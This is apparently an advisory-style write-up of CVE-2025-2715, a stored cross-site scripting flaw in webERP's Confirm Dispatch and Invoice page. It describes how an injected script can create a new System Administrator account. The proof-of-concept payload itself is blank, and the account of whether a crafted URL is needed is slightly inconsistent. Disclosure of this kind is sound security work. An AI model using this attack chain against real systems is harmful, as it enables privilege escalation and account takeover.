CVE-2025-2715

Root

Cause

The vulnerability resides in ConfirmDispatch_Invoice.php, a component of webERP's Confirm Dispatch and Invoice page. The Narrative parameter is not properly sanitized before being rendered. This allows a user with the Inquiries/Order Entry security role to inject arbitrary HTML and JavaScript into the field [1]. The unsanitized input is later stored and executed when a privileged user (e.g., a system administrator) views the page [1].

Exploitation

An attacker with the Inquiries/Order Entry role can craft a malicious order containing a JavaScript payload in the Narrative field. For example, the proof of concept uses `` to load an external script [1]. The attacker then sends a specially crafted URL to a system administrator. When the administrator opens the Confirm Dispatch and Invoice page, the injected script executes [1]. The attack does not require authentication beyond the low-privilege role, and the victim (administrator) only needs to view the page.

Impact

Successful exploitation allows the injected script to perform actions in the context of the administrator's session. The published reference demonstrates that the script can send a POST request to create a new user with System Administrator privileges, effectively leading to privilege escalation [1]. The CVSS v4.0 base score is 7.4 (High) for confidentiality and integrity impacts, though the original CVSS v3.1 score is 3.5 (Low) [1]. The discrepancy likely reflects that the attack requires a victim to interact with the malicious content.

Mitigation

The vendor has been contacted but did not respond. A patch is recommended [1]. Users should apply the latest fixes from the webERP repository or implement input sanitization for the Narrative field on ConfirmDispatch_Invoice.php [1]. As of the publication date, the vulnerability affects webERP up to version 5.0.0.rc+13, and no official advisory has been released.